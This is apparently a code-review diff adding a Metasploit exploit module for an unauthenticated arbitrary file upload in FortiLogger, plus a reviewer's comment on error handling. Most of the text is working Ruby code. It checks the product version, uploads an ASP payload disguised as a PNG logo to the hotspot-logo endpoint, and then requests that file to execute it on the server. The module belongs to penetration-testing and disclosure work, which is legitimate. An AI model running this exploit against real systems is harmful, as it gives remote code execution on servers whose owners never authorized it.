modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb

```diff
@@ -0,0 +1,156 @@
+      ]
+    )
+  end
+
+  def check_product_info
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
+      'method' => 'POST',
+      'data' => '',
+      'headers' => {
+        'Accept' => 'application/json, text/javascript, */*; q=0.01',
+        'Accept-Language' => 'en-US,en;q=0.5',
+        'Accept-Encoding' => 'gzip, deflate',
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    )
+  end
+
+  def check
+    begin
+      res = check_product_info
+
+      unless res
+        fail_with(Failure::Unreachable, 'No response from server')
+      end
+
+      unless res.code == 200
+        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+      end
+
+      version = Gem::Version.new(JSON.parse(res.body)['Version'])
+
+      if version <= Gem::Version.new('4.4.2.2')
+        CheckCode::Vulnerable("FortiLogger version #{version}")
+      else
+        CheckCode::Safe("FortiLogger version #{version}")
+      end
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'The target may have been updated')
+    end
+  end
+
+  def create_payload
+    Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
+  end
+
+  def exploit
+    begin
+      print_good('Generate Payload')
+      data = create_payload
+
+      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
+      post_data = "--#{boundary}\r\n"
+      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
+      post_data << "Content-Type: image/png\r\n"
+      post_data << "\r\n#{data}\r\n"
+      post_data << "--#{boundary}\r\n"
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
+        'ctype' => "multipart/form-data; boundary=#{boundary}",
+        'data' => post_data,
+        'headers' => {
+          'Accept' => 'application/json',
+          'Accept-Language' => 'en-US,en;q=0.5',
+          'X-Requested-With' => 'XMLHttpRequest'
+        }
+      )
+
+      unless res
+        fail_with(Failure::Unreachable, 'No response from server')
+      end
+
+      unless res.code == 200
+        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+      end
+
+      json_res = begin
+        JSON.parse(res.body)
+      rescue JSON::ParserError
+        nil
+      end
+
+      if json_res.nil? || json_res['Message'] == 'Error in saving file'
+        fail_with(Failure::UnexpectedReply, 'Error uploading payload')
+      end
+
+      print_good('Payload has been uploaded')
+
+      handler
+
+      print_status('Executing payload...')
+      send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
+        'method' => 'GET'
+      }, 5)
+    end
+  rescue StandardError
+    fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')
```

Comment:
Generic errors like this that cover a lot of code don't help end users understand what is going wrong. This method looks like it handles the unhappy paths pretty well, so I don't know if this `rescue` is even needed. If you do want to keep it, though, please keep the original error message:
```suggestion
  rescue => e
    fail_with(Failure::UnexpectedReply, "Failed to execute the payload: #{e}")
```